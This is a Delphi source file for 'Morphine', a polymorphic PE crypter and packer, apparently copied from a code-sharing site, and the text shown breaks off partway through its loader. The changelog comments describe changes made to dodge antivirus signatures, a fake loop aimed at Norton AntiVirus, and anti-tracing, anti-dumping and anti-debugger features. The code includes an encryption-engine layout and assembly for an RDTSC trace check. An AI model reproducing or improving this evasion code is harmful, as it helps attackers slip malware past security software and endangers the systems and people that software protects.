📄 morphine.dpr
字号:
program morphine;
{$APPTYPE CONSOLE}
//Upgraded, fixed and reloaded by Silent Shield (Dayvo)
//if RUBBISH_NOPS defined, inserted rubbish are nops only (good for debugging)
{ $DEFINE RUBBISH_NOPS}
{ $DEFINE STATIC_CONTEXT}
uses Windows, apLib, Classes, SysUtils, pelib;
{$R *.res} //Icon Resource DATA
//ORIGINAL
//this is how our new PE loox like:
//
//CodeSection:
//0..$10: jmp GetProcAddress+jmp LoadLibrary+pad
//$10..$10+KeySize:Key
//$10+KeySize..$10+KeySize+sizeof(DynLoader):DynLoader
//$10+KeySize+sizeof(DynLoader): code
//
//DataSection:
//0..sizeof(host)-1: host
//
//ImportSection:
//0..$70-1: imports
//
//[TlsSection:]
//0..sizeof(tls): tls
//
//Changelog 1.2a
//moved import function jmps (getprocaddress, loadlibrary) to the end of initdata/polymorphic loader to
//prevent AV detection (code section started with ..000000FF2534.. which was a signature):
//implemented several variants of each jmp to import section (getprocaddress, loadlibrary) and added fixups
//this is how our new PE loox like:
//
//CodeSection:
//$0..KeySize:Key
//KeySize..KeySize+sizeof(DynLoader):DynLoader
//KeySize+sizeof(DynLoader): code
//
//DataSection:
//0..sizeof(host)-1: host
//
//ImportSection:
//0..$70-1: imports
//
//[TlsSection:]
//0..sizeof(tls): tls
//Changelog 1.2b
//- some random data (CoderRoller1) into encryption routine (DynCoder and Decoder)
//- data section eliminated (too risky to have it)
//- minor bug fixes
//
//this is how our new PE loox like:
//
//CodeSection:
//0: Rubbish
//KeyPtr..KeyPtr+KeySize:Key
//KeyPtr+KeySize..KeyPtr+KeySize+sizeof(DynLoader):DynLoader
//KeyPtr+KeySize+sizeof(DynLoader): code
//code+sizeof(code): host
//
//ImportSection:
//0..$70-1: imports
//
//[TlsSection:]
//0..sizeof(tls): tls
//Changelog 1.3
//- polycode liposuction
//- polycode instruction naming
//Changelog 1.4
//- DLL SUPPORT!!!
//- well some hacks are here, so nobody can say that the code is correct - see DynLoader
//- minor bugfixes
//+ .edata section after .tls
//Changelog 1.5
//- polycode improved
//Changelog 1.6
//- polycode shrinked
//- dynloader decrypts main data
//Changelog 1.7
//- secondary encryption routine has variable-length key
//Changelog 1.8
//- polycode shrinked
//Changelog 1.9
//- icon + XP manifest support
//Changelog 2.0
//- secondary encryption routine is randomly generated
//- resource support for DLLs
//- fake loop against Norton AntiVirus
//Changelog 2.1
//- FSG 2.0 exe packer support
//Changelog 2.2
//- support for some other exe packers - Mew 1.1
//Changelog 2.3
//- fixed two serious bugz
//Changelog 2.4
//- better support for VB programs
//- support for end of file overlay data
//Changelog 2.5
//- bugfix in TLS support
//Changelog 2.6
//- bugfix in TLS support number 2
//Changelog 2.7
//- better DLL handling -> support for NT4 DLLs
//Changelog 2.8
//- tracing protection
//Changelog 2.9
//- tracing protection fixed
//- OEP Protection
//Changelog 3.0
//- now it can pack EXE or DLL
//Changelog 3.1
//- AntiDumping Protection
//Changelog 3.2
//- this program isn't be published because he has a lot of problems and i don't know to fix it
//Changelog 3.3
//- only Anti Debugger Function added, but it containts Ultra Halt :-0
//Changelog 3.5
//- only Sm@ll Import Table Protection added, but it containts Some crazy Functions
//if you need sum PEB, TEB structures (like in DynLoader)
//try look at these links:
//http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/Thread/TEB.html
//http://undocumented.ntinternals.net/UserMode/Structures/LDR_MODULE.html
//http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/Process/PEB.html
const
//we need a dos stub
//that's the common dos prog writing "This program cannot be run in DOS mode"
DosStub:array[0..$38-1] of Byte=
($BA,$10,$00,$0E,$1F,$B4,$09,$CD,$21,$B8,$01,$4C,$CD,$21,$90,$90,
$54,$68,$69,$73,$20,$70,$72,$6F,$67,$72,$61,$6D,$20,$6D,$75,$73,
$74,$20,$62,$65,$20,$72,$75,$6E,$20,$75,$6E,$64,$65,$72,$20,$57,
$69,$6E,$33,$32,$0D,$0A,$24,$37);
//import section constants
NumberOfDLL=1; //number of dlls
NumberOfImports=2; //number of funcs
Kernel32Name='KeRnEl32.dLl'; //name of dll
NtdllName='ntdll.dll'; //name of ntdll.dll
GetProcAddressName='GetProcAddress'; //name of funct1
LoadLibraryName='LoadLibraryA'; //name of func2
Kernel32Size=12; //length of dll name
GetProcAddressSize=14; //length of func1 name
LoadLibrarySize=12; //length of func2 name
//polymorphic instruction indexes
PII_BEGIN = 0;
PII_POLY_BEGIN = PII_BEGIN;
PII_POLY_PUSHAD = PII_POLY_BEGIN;
PII_POLY_MOV_REG_LOADER_SIZE = PII_POLY_PUSHAD+1;
PII_POLY_MOV_REG_LOADER_ADDR = PII_POLY_MOV_REG_LOADER_SIZE+1;
PII_CODER_BEGIN = PII_POLY_MOV_REG_LOADER_ADDR+1;
PII_CODER_CALL_GET_EIP = PII_CODER_BEGIN+1;
PII_CODER_GET_EIP = PII_CODER_CALL_GET_EIP+1;
PII_CODER_FIX_DST_PTR = PII_CODER_GET_EIP+1;
PII_CODER_KEY_START = PII_CODER_FIX_DST_PTR+1;
PII_CODER_MOV_REG_KEY = PII_CODER_KEY_START;
PII_CODER_FIX_SRC_PTR = PII_CODER_MOV_REG_KEY+1;
PII_CODER_CODE = PII_CODER_FIX_SRC_PTR+1;
PII_CODER_LOAD_KEY_TO_REG = PII_CODER_CODE;
PII_CODER_TEST_KEY_END = PII_CODER_LOAD_KEY_TO_REG+1;
PII_CODER_JZ_CODER_BEGIN = PII_CODER_TEST_KEY_END+1;
PII_CODER_ADD_DATA_IDX = PII_CODER_JZ_CODER_BEGIN+1;
PII_CODER_XOR_DATA_REG = PII_CODER_ADD_DATA_IDX+1;
PII_CODER_STORE_DATA = PII_CODER_XOR_DATA_REG+1;
PII_CODER_INC_SRC_PTR = PII_CODER_STORE_DATA+1;
PII_CODER_LOOP_CODER_CODE = PII_CODER_INC_SRC_PTR+1;
PII_CODER_END = PII_CODER_LOOP_CODER_CODE+1;
PII_POLY_JMP_DYNLOADER = PII_CODER_END+1;
PII_POLY_END = PII_POLY_JMP_DYNLOADER;
PII_END = PII_POLY_END;
//other consts
MaxPolyCount=20; //maximum variants for one instruction
InitInstrCount=PII_END+1; //polymorphic loader instruction count
RawDataAlignment=$200; //alignment of SizeOfRawData
DosStubEndSize=$88; //$100 - SizeOf(DosStub)
//image type const
IMAGE_TYPE_EXE=0;
IMAGE_TYPE_DLL=1;
IMAGE_TYPE_SYS=2;
IMAGE_TYPE_UNKNOWN=$FFFFFFFF;
//this dword is at the end of DYN_LOADER in decoded form
DYN_LOADER_END_MAGIC=$C0DEC0DE;
DYN_LOADER_DEC_MAGIC=$1EE7C0DE;
//registers
REG_EAX=0;
REG_ECX=1;
REG_EDX=2;
REG_EBX=3;
REG_ESP=4;
REG_EBP=5;
REG_ESI=6;
REG_EDI=7;
REG_NON=255;
Reg8Count=8;
Reg16Count=8;
Reg32Count=8;
RT_XP_MANIFEST=24;
type
//now several types i was unable to find in std windows.pas
//and was so lazy to use more units :o)
PImageImportByName=^TImageImportByName;
TImageImportByName=packed record
Hint:Word;
Name:array of Char;
end;
PImageThunkData=^TImageThunkData;
TImageThunkData=packed record
case Byte of
0:(ForwarderString:PByte);
1:(FunctionPtr:PCardinal);
2:(Ordinal:Cardinal);
3:(AddressOfData:PImageImportByName);
end;
PImageImportDescriptor=^TImageImportDescriptor;
TImageImportDescriptor=packed record
case Byte of
0:(Characteristics,cTimeDateStamp,cForwarderChain,cName:Cardinal;cFirstThunk:PImageThunkData);
1:(OriginalFirstThunk:PImageThunkData;oTimeDateStamp,oForwarderChain,oName:Cardinal;oFirstThunk:PImageThunkData);
end;
PExportDirectoryTable=^TExportDirectoryTable;
TExportDirectoryTable=packed record
Flags,TimeStamp:Cardinal;
MajorVersion,MinorVersion:Word;
NameRVA,OrdinalBase,AddressTableEntries,NumberOfNamePointers,ExportAddressTableRVA,
NamePointerRVA,OrdinalTableRVA:Cardinal;
end;
//that's how .tls section loox like
PTlsSectionData=^TTlsSectionData;
TTlsSectionData=packed record
RawDataStart,RawDataEnd,AddressOfIndex,AddressOfCallbacks,SizeOfZeroFill,Characteristics:Cardinal;
end;
//our type for all about tls section
TTlsCopy=record
Directory:PImageDataDirectory;
SectionData:PTlsSectionData;
RawData:Pointer;
RawDataLen,Index:Cardinal;
Callbacks:Pointer;
CallbacksLen:Cardinal;
end;
//one pseudo-instruction (p-i) from polymorphic engine (can contain more than one x86 instruction)
TInstruction=packed record
Len:Byte; //opcode length
Fix1,Fix2,Fix3,Fix4:Byte; //bytes indexes for fixup
Code:array[0..30] of Char; //opcode
end;
//a list of p-i, we will chose one each time and put it into a code
TVarInstruction=packed record
Count,Index:Byte; //number of p-i and number of the chosen
VirtualAddress:Cardinal; //address of instruction in CODE section
Vars:array[0..MaxPolyCount-1] of TInstruction;//the list
end;
PResourceDirectoryTable=^TResourceDirectoryTable;
TResourceDirectoryTable=packed record
Characteristics:Cardinal;
TimeDateStamp:Cardinal;
MajorVersion:Word;
MinorVersion:Word;
NumberOfNameEntries:Word;
NumberOfIDEntries:Word;
end;
PResourceDirectoryEntry=^TResourceDirectoryEntry;
TResourceDirectoryEntry=packed record
NameID:Cardinal;
SubdirDataRVA:Cardinal;
end;
PResourceDataEntry=^TResourceDataEntry;
TResourceDataEntry=packed record
DataRVA:Cardinal;
Size:Cardinal;
Codepage:Cardinal;
Reserved:Cardinal;
end;
PResourceTableDirectoryEntry=^TResourceTableDirectoryEntry;
TResourceTableDirectoryEntry=packed record
Table:TResourceDirectoryTable;
Directory:TResourceDirectoryEntry;
end;
PIconDirectoryEntry=^TIconDirectoryEntry;
TIconDirectoryEntry=packed record
Width:Byte;
Height:Byte;
ColorCount:Byte;
Reserved:Byte;
Planes:Word;
BitCount:Word;
BytesInRes:Cardinal;
ID:Word;
end;
PIconDirectory=^TIconDirectory;
TIconDirectory=packed record
Reserved:Word;
ResType:Word;
Count:Word;
Entries:array[0..31] of TIconDirectoryEntry;
end;
TImageType=(itExe,itDLL,itSys);
TEncoderProc=function(AAddr:Pointer):Cardinal; stdcall;
var
DosHeader:TImageDosHeader;
DosStubEnd:array[0..DosStubEndSize-1] of Char;
NtHeaders:TImageNtHeaders;
FileHandle,MainFile:THandle;
InputFileName,OutputFileName,Options:string;
NumBytes,TotalFileSize,MainSize,LoaderSize,VirtLoaderData,VirtMainData,VirtKey,InitSize,KeyPtr,
AnyDWORD,LoaderPtr,TlsSectionSize,Delta,HostImageBase,HostSizeOfImage,HostCharacteristics,
ReqImageBase,RandomValue,ExportSectionSize,CurVirtAddr,CurRawData,ExportRVADelta,
HostExportSectionVirtualAddress,ExportNamePointerRVAOrg,ExportAddressRVAOrg,
ImportSectionDataSize,HostImportSectionSize,ImportSectionDLLCount,
HostImportSectionVirtualAddress,InitcodeThunk,CodeSectionVirtualSize,LoaderRealSize,
MainRealSize,MainRealSize4,LogCnt,MainDataDecoderLen,DynLoaderDecoderOffset,LdrPtrCode,LdrPtrThunk,
ResourceSectionSize,HostResourceSectionSize,ResourceIconGroupDataSize,HostResourceSectionVirtualAddress,
ResourceXPMDirSize,AfterImageOverlaysSize:Cardinal;
CodeSection,ExportSection,TlsSection,ImportSection,ResourceSection:TImageSectionHeader;
ImportDesc,NullDesc:TImageImportDescriptor;
PImportDesc:PImageImportDescriptor;
ThunkGetProcAddress,ThunkLoadLibrary:TImageThunkData;
NullWord,KeySize,TrashSize,Trash2Size,HostSubsystem:Word;
{A}MDC,{E}MainData,MainDataCyp,LoaderData,Key,InitData,Trash,Trash2,Ptr,ExportData,ImportSectionData,ResourceData,
MainDataEncoder,MainDataDecoder,AfterImageOverlays:Pointer;
PB,PB2,PB3,PB4,DynLoaderSub,LdrPtr,MainDataDecPtr:PByte;
TlsSectionPresent,ExportSectionPresent,Quiet,DynamicDLL,ResourceSectionPresent,SaveIcon,
SaveOverlay,OverlayPresent:Boolean;
TlsCopy:TTlsCopy;
TlsSectionData:TTlsSectionData;
ImageType:TImageType;
PackedSize,I:Integer;
DynLoaderJmp:PCardinal;
ResourceRoot,ResourceIconGroup,ResourceXPManifest:PResourceDirectoryTable;
ResourceDirEntry:PResourceDirectoryEntry;
EncoderProc:TEncoderProc;
procedure DynLoader; assembler; stdcall;
//THE LOADER!
//this loads pe file to memory from MainData
//fixup relocations
//fixup imports
//fixup exports
//doesn't protect pages - cuz we don't need this !?
//
asm
push 012345678h //LoadLibrary
push 012345678h //GetProcAddress
push 012345678h //Addr of MainData
//now lil hack
//we use rva for maindata, but we don't know image base
//we get eip and and it with 0FFFFF000h which does
//from 000401XXXh something like 000401000h that's why we
//have to be sure this code is not after 2000h, but WE DO know it
// Trace Tester
db 0fh,031h
push eax
db 0fh,031h
sub eax,dword ptr [esp]
add esp,04h
cmp eax,0FFFh
ja @traced
jmp @not_traced
@traced:
popad
popad
retn
@not_traced:
{
//OEP Protection
push FS:[30h]
pop ebp
mov ebp,[ebp+0Ch]
mov ebp,[ebp+0Ch]
mov DWORD PTR [ebp+20h],0FFFFFh // increase size variable
//
}
call @get_eip
@get_eip:
pop eax
and eax,0FFFFF000h
add [esp],eax
add [esp+004h],eax
add [esp+008h],eax
call @DynLoader_begin
//one more hack here
//code in LoadLibrary that call DllMain saves its esp into esi
//but we modify esi a lot and we shouldn't do this, also ebp for NT4 is need to safe
//but we can fix this up, cuz we know we left esp and it has right value
//so add sum 010h for DllMain params + ret addr and here we go
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -